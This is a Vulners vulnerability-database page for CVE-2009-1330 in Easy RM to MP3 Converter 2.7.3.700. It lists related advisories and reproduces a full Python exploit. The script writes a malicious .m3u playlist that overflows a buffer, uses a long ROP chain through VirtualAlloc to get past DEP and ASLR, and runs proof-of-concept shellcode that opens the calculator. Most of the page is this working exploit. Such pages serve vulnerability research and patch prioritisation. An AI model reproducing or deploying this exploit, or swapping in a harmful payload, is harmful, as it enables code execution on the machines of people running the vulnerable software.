Vulners
Lucene search
Easy RM to MP3 Converter 2.7.3.700 - '.m3u' Exploit (Universal ASLR + DEP Bypass)
| Reporter | Title | Published | Views | Family All 11 |
|---|---|---|---|---|
 | CVE-2009-1330 | 13 Apr 200900:00 | – | circl |
 | CVE-2009-1330 | 17 Apr 200910:00 | – | cve |
 | CVE-2009-1330 | 17 Apr 200910:00 | – | cvelist |
 | Easy RM to MP3 Converter 2.7.3.700 - '.m3u' File (Universal ASLR + DEP Bypass) | 13 Jun 201600:00 | – | exploitdb |
 | EUVD-2009-1328 | 7 Oct 202500:30 | – | euvd |
 | Easy RM to MP3 Converter 2.7.3.700 - .m3u File (Universal ASLR + DEP Bypass) | 13 Jun 201600:00 | – | exploitpack |
 | CVE-2009-1330 | 17 Apr 200914:08 | – | nvd |
 | Easy RM to MP3 Converter Buffer Overflow Vulnerability | 30 Apr 200900:00 | – | openvas |
| Easy RM to MP3 Converter Buffer Overflow Vulnerability | 30 Apr 200900:00 | – | openvas |
 | Easy RM To MP3 Converter 2.7.3.700 Universal DEP + ASLR Bypass | 13 Jun 201600:00 | – | packetstorm |
10
# Exploit Title: Easy RM to MP3 Converter 2.7.3.700 (.m3u) File BoF Exploit with Universal DEP+ASLR bypass
# Date: 2016-06-12
# Exploit Author: Csaba Fitzl
# Vendor Homepage: N/A
# Version: 2.7.3.700
# Tested on: Windows 7 x64
# CVE : CVE-2009-1330
import struct
def create_rop_chain():
# rop chain generated with mona.py - www.corelan.be
# added missing parts, and some optimisation by Csaba Fitzl
rop_gadgets = [
#mov 1000 to EDX - Csaba
0x41414141, # Filler (compensate)
0x41414141, # Filler (compensate)
0x41414141, # Filler (compensate)
0x10025a1c, # XOR EDX,EDX # RETN
0x1002bc3d, # MOV EAX,411 # RETN
0x1002dc4c, # ADD EAX,100 # POP EBP # RETN
0x41414141, # Filler (compensate)
0x1002dc4c, # ADD EAX,100 # POP EBP # RETN
0x41414141, # Filler (compensate)
0x1002dc4c, # ADD EAX,100 # POP EBP # RETN
0x41414141, # Filler (compensate)
0x1002dc4c, # ADD EAX,100 # POP EBP # RETN
0x41414141, # Filler (compensate)
0x1002dc4c, # ADD EAX,100 # POP EBP # RETN
0x41414141, # Filler (compensate)
0x1002dc4c, # ADD EAX,100 # POP EBP # RETN
0x41414141, # Filler (compensate)
0x1002dc4c, # ADD EAX,100 # POP EBP # RETN
0x41414141, # Filler (compensate)
0x1002dc4c, # ADD EAX,100 # POP EBP # RETN
0x41414141, # Filler (compensate)
0x1002dc4c, # ADD EAX,100 # POP EBP # RETN
0x41414141, # Filler (compensate)
0x1002dc4c, # ADD EAX,100 # POP EBP # RETN
0x41414141, # Filler (compensate)
0x1002dc4c, # ADD EAX,100 # POP EBP # RETN
0x41414141, # Filler (compensate)
0x1002dc24, # ADD EAX,80 # POP EBP # RETN
0x41414141, # Filler (compensate)
0x1002dc41, # ADD EAX,40 # POP EBP # RETN
0x41414141, # Filler (compensate)
0x1001d2ac, # ADD EAX,4 # RETN
0x1001d2ac, # ADD EAX,4 # RETN
0x1001d2ac, # ADD EAX,4 # RETN
0x1001d2ac, # ADD EAX,4 # RETN
0x1001d2ac, # ADD EAX,4 # RETN
0x1001d2ac, # ADD EAX,4 # RETN
0x1001d2ac, # ADD EAX,4 # RETN
0x1001d2ac, # ADD EAX,4 # RETN
0x1001d2ac, # ADD EAX,4 # RETN
0x1001d2ac, # ADD EAX,4 # RETN
0x1001d2ac, # ADD EAX,4 # RETN
0x10023327, # INC EAX # RETN
0x10023327, # INC EAX # RETN
0x10023327, # INC EAX # RETN
# AT this point EAX = 0x1000
0x1001a788, # PUSH EAX # POP ESI # POP EBP # MOV EAX,1 # POP EBX # POP ECX # RETN [MSRMfilter03.dll]
0x41414141, # Filler (compensate)
0x41414141, # Filler (compensate)
0x41414141, # Filler (compensate)
0x1001bf0d, #(RVA : 0x0001bf0d) : # ADC EDX,ESI
0x41414141, # Filler (compensate)
0x10026d56, # POP EAX # RETN [MSRMfilter03.dll]
0x10032078, # ptr to &VirtualAlloc() [IAT MSRMfilter03.dll]
0x1002e0c8, # MOV EAX,DWORD PTR DS:[EAX] # RETN [MSRMfilter03.dll]
0x1001a788, # PUSH EAX # POP ESI # POP EBP # MOV EAX,1 # POP EBX # POP ECX # RETN [MSRMfilter03.dll]
0x41414141, # Filler (compensate)
0x41414141, # Filler (compensate)
0x41414141, # Filler (compensate)
0x10027c5a, # POP EBP # RETN [MSRMfilter03.dll]
0x1001b058, # & push esp # ret [MSRMfilter03.dll]
0x1002b93e, # POP EAX # RETN [MSRMfilter03.dll]
0xfffffffb, # put delta into eax (-> put 0x00000001 into ebx)
0x1001d2ac, # ADD EAX,4 # RETN
0x10023327, # INC EAX # RETN
0x10023327, # INC EAX # RETN
0x1001bdee, # PUSH EAX # MOV EAX,1 # POP EBX # ADD ESP,8 # RETN [MSRMfilter03.dll]
0x41414141, # Filler (compensate)
0x41414141, # Filler (compensate)
0x10029f74, # POP ECX # RETN [MSRMfilter03.dll]
0xffffffff, #
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002bc6a, # POP EDI # RETN [MSRMfilter03.dll]
0x1001c121, # RETN (ROP NOP) [MSRMfilter03.dll]
0x10026f2b, # POP EAX # RETN [MSRMfilter03.dll]
0x10024004, #address to xor, it will point to the DLL's data section which is writeable. Also will work as NOP
0x1002bc07 # PUSHAD # XOR EAX,11005 # ADD BYTE PTR DS:[EAX],AL
]
return ''.join(struct.pack('<I', _) for _ in rop_gadgets)
buffersize = 26090
junk = "A" * buffersize
eip = '\x85\x22\x01\x10' # {pivot 8 / 0x08} : # ADD ESP,8 # RETN
rop = create_rop_chain()
calc = (
"\x31\xD2\x52\x68\x63\x61\x6C\x63\x89\xE6\x52\x56\x64"
"\x8B\x72\x30\x8B\x76\x0C\x8B\x76\x0C\xAD\x8B\x30\x8B"
"\x7E\x18\x8B\x5F\x3C\x8B\x5C\x1F\x78\x8B\x74\x1F\x20"
"\x01\xFE\x8B\x4C\x1F\x24\x01\xF9\x42\xAD\x81\x3C\x07"
"\x57\x69\x6E\x45\x75\xF5\x0F\xB7\x54\x51\xFE\x8B\x74"
"\x1F\x1C\x01\xFE\x03\x3C\x96\xFF\xD7")
shell = "\x90"*0x10 + calc
exploit = junk + eip + rop + shell + 'C' * (1000-len(rop)-len(shell))
filename = "list.m3u"
textfile = open(filename , 'w')
textfile.write(exploit)
textfile.close()
# 0day.today [2018-01-10] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
13 Jun 2016 00:00Current
6.3Medium risk
Vulners AI Score6.3
EPSS0.06455